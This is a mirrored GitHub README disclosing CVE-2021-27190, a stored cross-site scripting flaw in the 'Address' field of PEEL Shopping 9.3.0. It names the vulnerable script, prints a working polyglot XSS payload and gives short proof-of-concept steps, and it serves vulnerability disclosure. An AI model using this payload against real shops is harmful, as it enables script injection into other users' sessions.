Coder Social home page Coder Social logo

cve-2021-27190-peel-shopping-cart-9.3.0-stored-xss's Introduction

CVE-2021-27190 - PEEL Shopping, eCommerce shopping cart - Stored Cross-Site Scripting Vulnerability in 'Address'

Watch the video

Date

2021-02-11

Exploit Author

Anmol K Sachan

Vendor Homepage

https://www.peel.fr/

Software Link

https://www.peel.fr/nos-offres-1/peel-shopping-31.html
https://sourceforge.net/projects/peel-shopping/

Vulnerable Software Link

https://drive.google.com/file/d/1dIwRdaqtEyqUUgxbRqrHiS5WQ10nEG8z/view?usp=sharing

Software: :

PEEL SHOPPING 9.3.0

Vulnerability Type

Stored Cross-site Scripting

Vulnerability

Stored XSS

Tested on Windows 10 XAMPP


CVE Assigned

CVE-2021-27190
This application is vulnerable to Stored XSS vulnerability.

Vulnerable script

http://localhost/peel-shopping_9_3_0/utilisateurs/change_params.php

https://github.com/anmolksachan/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS/edit/main/README.MD## Vulnerable parameters 'Address'

Payload used

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

POC

https://drive.google.com/file/d/1t1hksDsYqYsqryRq61tNIQQMTCFidtc1/view
In the same page where we injected payload click on the text box to edit the address.
You will see your Javascript code (XSS) executed.

Referneces

  1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27190
  2. https://packetstormsecurity.com/files/161367/PEEL-Shopping-9.3.0-Cross-Site-Scripting.html
  3. https://www.exploit-db.com/exploits/49553
  4. https://www.secuneus.com/cve-2021-27190-peel-shopping-ecommerce-shopping-cart-stored-cross-site-scripting-vulnerability-in-address/
  5. https://cxsecurity.com/issue/WLB-2021020054
  6. https://nvd.nist.gov/vuln/detail/CVE-2021-27190

cve-2021-27190-peel-shopping-cart-9.3.0-stored-xss's People

Contributors

anmolksachan avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.